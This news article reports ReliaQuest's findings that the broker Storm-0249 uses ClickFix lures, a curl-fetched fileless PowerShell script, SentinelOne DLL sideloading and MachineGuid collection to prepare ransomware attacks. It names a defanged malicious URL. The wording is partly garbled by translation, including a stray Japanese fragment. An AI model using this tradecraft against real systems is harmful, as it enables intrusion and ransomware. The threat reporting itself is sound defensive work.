The threat actor known as Storm-0249 may be moving from its role as an initial access broker to a combination of more sophisticated tactics such as domain spoofing, DLL sideloading, and fileless PowerShell execution to facilitate ransomware attacks.
“These techniques allow them to evade defenses, penetrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News.
Storm-0249 is the nickname assigned by Microsoft to an early access broker that has sold a foothold into its organization to other cybercrime groups, including ransomware and extortionists like Storm-0501. This was first noticed by the tech giant in September 2024.
Then, earlier this year, Microsoft also revealed details of a phishing campaign run by the attacker. The campaign leveraged tax-related themes to target users in the United States ahead of tax filing season and infected them with the Latrodectus and BruteRatel C4 (BRc4) post-exploit frameworks.
The ultimate goal of these infections is to gain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, making them readily available to targets and accelerating the pace of such attacks.
ReliaQuest’s latest findings signal a change in tactics. Storm-0249 uses the infamous ClickFix social engineering tactic to hack Windows under the pretext of resolving technical issues.[ファイル名を指定して実行]It tricks potential targets into executing malicious commands through dialogs.
In this case, the copied and executed command leverages the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain, giving the victim a false sense of trust (“sgcipl”)[.]com/us.microsoft.com/bdo/”) and run fileless via PowerShell.
This executes a malicious MSI package with SYSTEM privileges and drops a trojanized DLL associated with SentinelOne’s endpoint security solution (‘SentinelAgentCore.dll’) into the user’s AppData folder along with the legitimate ‘SentinelAgentWorker.exe’ executable.
The idea is to sideload a malicious DLL when the ‘SentinelAgentWorker.exe’ process starts, thereby making the activity undetectable. The DLL then establishes encrypted communication with a command and control (C2) server.
Storm-0249 has also been observed leveraging legitimate Windows administrative utilities such as reg.exe and findstr.exe to extract unique system identifiers such as MachineGuid, laying the foundation for subsequent ransomware attacks. The use of living-off-the-land (LotL) tactics and the fact that these commands are executed under the trusted “SentinelAgentWorker.exe” process means that this activity is unlikely to raise any red flags.
This finding marks a shift from large-scale phishing campaigns to precision attacks that weaponize trust associated with signed processes to increase stealth.
“This is not just general reconnaissance, but preparation for ransomware affiliates,” ReliaQuest said. “Ransomware groups such as LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.”
“By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binaries or attempt to reverse engineer the encryption algorithms, they will not be able to decrypt the files without the attacker-controlled keys.”
Source link
